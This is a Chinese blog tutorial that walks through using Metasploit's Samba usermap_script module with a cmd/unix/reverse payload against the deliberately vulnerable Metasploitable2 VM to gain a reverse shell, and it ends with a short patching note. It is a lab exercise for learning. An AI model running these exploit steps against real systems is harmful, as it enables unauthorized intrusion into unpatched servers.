Metasploit技术(三)——漏洞利用

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量4.8k 收藏 16
点赞数 1
分类专栏: Web渗透测试 文章标签: 网络安全 信息安全 Metasploit Web安全 Kali Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25505167/article/details/124024998
版权

目录

四、漏洞利用

  每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统,微软公司会快速地开发针对这些Bug或漏洞地补丁,并为用户提供更新。全世界有大量地漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day漏洞。由于这种漏洞对网络安全具有巨大威胁,因此0day漏洞也成为黑客的最爱。实际上能够掌握0day漏洞的黑客少之又少。

  微软公司会针对发现的Bug定期发布补丁,但是否下载更新则取决于用户自身。安全意识薄弱的个人用户或者中小企业常会忽略这些工作,特别是早小公司中,从补丁发布到服务器打补丁需要数星期,虽然打补丁时会涉及机器的重启或死机,对公司业绩没有帮助又增加了自身的工作量,但是未打补丁或补丁过期的操作系统对黑客而言是一个快乐的“天堂”。

  下面就假设目标机器时Metasploitable2,对Linux机器进行渗透攻击。Metasploitable2虚拟系统是一个特别制作的Ubuntu操作系统,主要用于安全工具测试和演示常见的咯偶东攻击。该虚拟系统兼容VWare、VirtualBox和其他虚拟平台,默认只开启一个网络适配器并且开启NAT和Host-Only。该工具可以在网站http://sourceforge.net/projects/metasploitable/files/Metasploitable2下载。

  首先对Linux目标机进行扫描,收集可用的服务信息。使用Nmap扫描并查看系统开放端口和相关的应用程序,如图7所示。

图7 添加版本扫描

  收集到目标主机相关的信息后,为其选择正确的Exploit和适合的Payload。从扫描结果中发现主机运行着Samba 3.x服务。

  Samba是在Linux和UNIX系统上实现SMB(Server Message Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件的打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件机打印机等资源的共享服务。

  输入search samba命令搜索Samba的漏洞利用模块,并选择合适的漏洞利用模块,如图8所示。

图8 搜索Samba的漏洞利用模块

  然后Samba服务将返回漏洞利用模块的列表,按照各个漏洞被利用成功的相对难易程度进行排序。

  因为exploit/multi/samba/usermap_script被标记为“Execellent”,即最杰出的,为提高渗透率,这里选择此模块进行接下来的渗透。

  有关漏洞的详细信息可以通过info exploit/multi/samba/usermap_script命令查看,如图9所示。

图9 查看模块的详细信息

  输入以下命令即可使用该漏洞的利用模块。

msf> use exploit/multi/samba/usermap_script

  然后可以看到Metasploit命令提示符msf>会变成msf exploit(usermap_script)>。

  使用show payloads命令即可查看该漏洞利用模块下可供选择的攻击载荷模块,如图10所示,因为目标是Linux机器,因此一定要选择Linux的攻击载荷。

图10 列举攻击载荷

  这里使用set PAYLOAD cmd/unix/reverse命令选择基础的cmd/unix/reverse反向攻击载荷模块,如图11所示。

图11 设置攻击载荷模块

  设置被攻击主机IP地址,命令如下所示。

msf exploit(usermap_script)> set RHOST 192.168.

  设置漏洞利用的端口号,命令如下所示。

msf exploit(usermap_script)> set RPORT 445

  设置发动攻击主机IP地址,命令如下所示。

msf exploit(usermap_script)> set LHOST 192.168.

  设置完可以使用show options命令再次确认参数是否已设置正确,如图12所示。

图12 显示设置参数

  设置完所有参数变量后,输入攻击命令exploit或者run,如下所示,发动攻击。

msf exploit(usermap_script)> exploit

  MSF发动攻击成功后会获取目标主机的Shell,为了验证该Shell是目标主机的,可以查询主机名、用户名和IP地址,并与目标主机进行对比,如图13所示。

图13 攻击目标主机

  攻击成功后,可以看到在攻击机和目标机之间会建立一个Shell连接,渗透Windows系统的过程类似,唯一的差别是选择的漏洞利用模块和攻击载荷块不一样。建议多尝试各种Exploit和Payload的组合,以加深理解。

  防御方法:Samba服务漏洞发生在Samba版本3.0.20~3.0.25rc3中,当使用非默用户名映射脚本配置时,通过指定一个用户名包含Shell元字符,攻击者可以执行任意命令。将Samba升级到最新版本即可防御本漏洞。


Phanton03167
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
如何更新msf及其结构
10-08
更新msf 及其结构 exploit framework 的利用 很不错的哦
Kali Linux 学习日记4 -Metasploit(MSF)和 Nessus
qq_46081990的博客
03-06 1275
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 1900
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
metasploit工具Windows安装及使用教程
爱国小白帽
03-29 2万+
点击下载 msfconsole
Metasploit 手动更新漏洞及之后Armitage的配置
code_lab
08-30 1万+
没想到大部分的时间都花费在了这种地方 (┭┮﹏┭┮)在kali2.0中msfupdate并不能更新漏洞,需要从https://www.rapid7.com/products/metasploit/download.jsp 下载Metasploit的安装包进行更新,更新完成后打开Metasploit并使用version或者show exploits查看更新之后的本或者更新的exploits I
MSF以及Samba漏洞利用
zyh18851473527的博客
11-15 6986
文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据二、Metasploit基础2.1专业术语2.2渗透攻击步骤、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用端口3.1.2一个小问题**3.1.3使用TCP扫描模块并检查有那些参数需要设置**3.1.4使用unset取消某个参数3.2使用辅助模块进行服务扫描3.3使用Nmap扫描3.3.1系统扫描四、漏洞利用4.1Metasploitable2搭建4.2 S
漏洞利用篇(上)
m0_57929980的博客
06-16 6953
漏洞利用篇:介绍漏洞利用的基本概念及示例,主要讲解Shellcode的编写与编码
(23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞
03-16 7832
实战为本,理论先行
渗透之—— Kali中一键更新Metasploit框架
冰河的专栏
01-22 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86593093 最近,我升级Kali系统,升级后,尼玛Metasploit各种蛋疼的事情就发生了,我通过Metasploit整合OpenVAS,最后执行导入数据的时候,尼玛就报出了如下错误: opts must include a valid :workspace 于是...
更新KaliMetasploit框架,这些过程千万不要踩雷
weixin_59086772的博客
02-24 4090
本篇文章为大家分享在更新kaliMetasploit框架过程中容易踩的坑,已帮各位实践,下次更新时可避免。 Kali就不做过多介绍了,初学者一般都知道它的作用,就简单介绍Metasploit是一款免费可下载的框架,通过它可以很容易地获取开发并针对软件漏洞尝试攻击,它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。 前言 不想升级一整个kali,就想把MSF框架更新一下,从本5更新到把本6 好家伙,不更新不知道,一更新直接呆住了,时间长不说还繁琐。 apt install metasploit
漏洞利用技术讲解,漏洞分析与利用技巧
白帽子凯哥聊黑客
12-07 1749
网络安全领域,我经常会被问到关于漏洞利用的问题。作为一个长期从事网络安全研究的小哥哥,我明白漏洞利用的重要性,将通过这篇文章分享给大家。
Metasploit(九) 后漏洞利用
u010680986的博客
09-18 318
1. 清楚痕迹 1)禁用防火墙 首先,需要检查防火墙是否启动:run getcountermeasure meterpreter中打开被攻击系统的shell:netsh firewall show opmode 禁用:netsh firewall show opmode mode=disable 2)禁用杀毒软件和日志删除 文本编辑器打开killav.rb脚本,该文件位置在opt/framework/msf3/scripts/killav.rb,这个脚本里有一些基本的杀毒软件进程,运行会在被攻击
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1427
Metasploitable2
文件上传漏洞的原理和利用(详细)
永不落的梦想
07-05 3176
本文包含文件上传漏洞的原理、利用和防御,绕过文件上传限制的各种姿势可以有效地利用文件上传漏洞,非常全面详细
kali中MSF的更新(完美升级
LizimU_0911的博客
12-14 5251
1. 首先在root权限下进入命令行模式 2. 找到etc文件夹下的apt文件夹中的sources.list文件 3. 使用vi命令进入编辑模式,添加如图所示的内容:
06-各类系统了解及数据 /漏洞利用
qq_56414082的博客
02-17 165
除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据,第方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。
神兵利器:常见中间件漏洞利用脚本
LiBai'S BLOG
02-08 2万+
0x01 Exphub 目前包括Webloigc、Struts2、Tomcat、Drupal的漏洞利用脚本,均为亲测可用的脚本文件,尽力补全所有脚本文件的使用说明文档,优先更新高危且易利用的漏洞利用脚本。 0x02 Readme 漏洞利用脚本包括多种不同名称、类型、格式、后缀的文件,这些文件可以大致分为[漏洞验证脚本]、[漏洞利用脚本]、[远程命令执行脚本]、[shell交互脚本]、[Webshell上传脚本] 脚本文件示例:cve-1111-1111_xxxx.py 脚本文件种类[xxxx]: cv
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7264
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
工具分享 | LiqunKit 综合漏洞利用工具(下载地址在文末)
热门推荐
weixin_48202759的博客
11-29 2万+
免责声明 本程序由 Liqun @ snowlovely 共同驱动 仅限于内部测试使用,请勿用于未授权的攻击!! 该程序及用于安全人员本地测试使用!! 用户滥用造成的一切后果与作者无关!! 使用者请务必遵守当地法律!! 本程序不得用于商业用途,仅限学习交流!! 2021.11.26:「+」 1.新增数据综合利用模块 MSSQL数据利用模块 Oracle数据利用模块 Redis数据利用模块 Mysql数据利用模块 Postgersql数据利用模块 2.新增蓝凌
网站渗透测试之常见漏洞排行
网站安全专家
01-07 1419
我们SINE安全在进行Web渗透测试中网站漏洞利用率最高的前五个漏洞。常见漏洞包括注入漏洞、文件上传漏洞、文件包含漏洞、命令执行漏洞、代码执行漏洞、跨站点脚本(XSS)漏洞、SSRF漏洞、XML外部实体(XXE)漏洞、反序列化漏洞、解析漏洞等。,因为这些安全漏洞可能被黑客利用,从而影响业务。以下每一条路线都是一种安全风险。黑客可以通过一系列的攻击手段发现目标的安全弱点。如果安全漏洞被成功利用,目标将被黑客控制,威胁目标资产或正常功能的使用,最终导致业务受到影响。 常见的WebTOP5漏洞描述如下.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Phanton03167

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值